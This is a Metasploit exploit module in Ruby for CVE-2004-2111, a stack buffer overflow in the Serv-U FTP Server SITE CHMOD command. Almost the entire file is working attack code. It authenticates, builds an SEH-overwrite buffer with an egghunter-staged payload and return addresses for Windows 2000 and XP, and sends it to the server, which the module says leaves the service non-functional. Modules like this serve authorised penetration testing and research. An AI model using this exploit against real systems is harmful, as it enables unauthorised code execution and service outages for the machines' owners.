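##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Serv-U FTP Server "SITE CHMOD" stack buffer overflow (CVE-2004-2111).
#
# The module authenticates with the configured FTP credentials, then sends a
# single oversized SITE CHMOD command carrying an egghunter-staged payload.
# The service is left non-functional afterwards (see 'Description').
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Egghunter
  include Msf::Exploit::Remote::Ftp

  # Banner pattern for the versions this module claims (3.x, 4.0 and 4.1).
  # The dots are escaped so the check matches the version string literally
  # rather than any character (the unescaped form also matched e.g. "4x0").
  VULNERABLE_BANNER = /Serv-U FTP Server v((4\.(0|1))|3\.\d)/.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Serv-U FTP Server Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in the site chmod command
          in versions of Serv-U FTP Server prior to 4.2

          You must have valid credentials to trigger this vulnerability. Exploitation
          also leaves the service in a non-functional state.
        },
        'Author' => 'theLightCosine',
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2004-2111'],
          [ 'OSVDB', '3713'],
          [ 'BID', '9483'],
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Payload' => {
          'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
          'DisableNops' => true,
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Windows 2000 SP0-4 EN', {
              'Ret' => 0x750212bc, # WS2HELP.DLL
              'Offset' => 396
            }
          ],
          [
            'Windows XP SP0-1 EN', {
              'Ret' => 0x71aa388f, # WS2HELP.DLL
              'Offset' => 394
            }
          ]
        ],
        'DisclosureDate' => '2004-12-31',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Passive version check: connect, capture the FTP banner, disconnect, and
  # compare the banner against VULNERABLE_BANNER.
  #
  # @return [Exploit::CheckCode] Appears when the banner names a 3.x/4.0/4.1
  #   server, Safe otherwise (including when no banner was captured).
  def check
    connect
    disconnect

    # banner is populated by the Ftp mixin during connect; to_s guards a nil banner.
    return Exploit::CheckCode::Appears if banner.to_s.match?(VULNERABLE_BANNER)

    Exploit::CheckCode::Safe
  end

  # Log in with the configured credentials and send the overflowing SITE command.
  #
  # Buffer layout: "chmod 777 " | NOP padding | egg | egghunter | nSEH | SEH | filler,
  # where the padding is sized so that nSEH lands at target['Offset'].
  # Returns early (without sending anything) when the login fails.
  def exploit
    return unless connect_login

    eggoptions = {
      checksum: true,
      eggtag: "W00T"
    }

    hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)

    buffer = "chmod 777 "
    buffer << make_nops(target['Offset'] - egg.length - hunter.length)
    buffer << egg
    buffer << hunter
    buffer << "\xeb\xc9\x41\x41" # nseh, jump back to egghunter
    buffer << [target.ret].pack('V') # seh
    buffer << rand_text(5000)

    print_status("Trying target #{target.name}...")

    send_cmd(['SITE', buffer], false)

    handler
    disconnect
  end
end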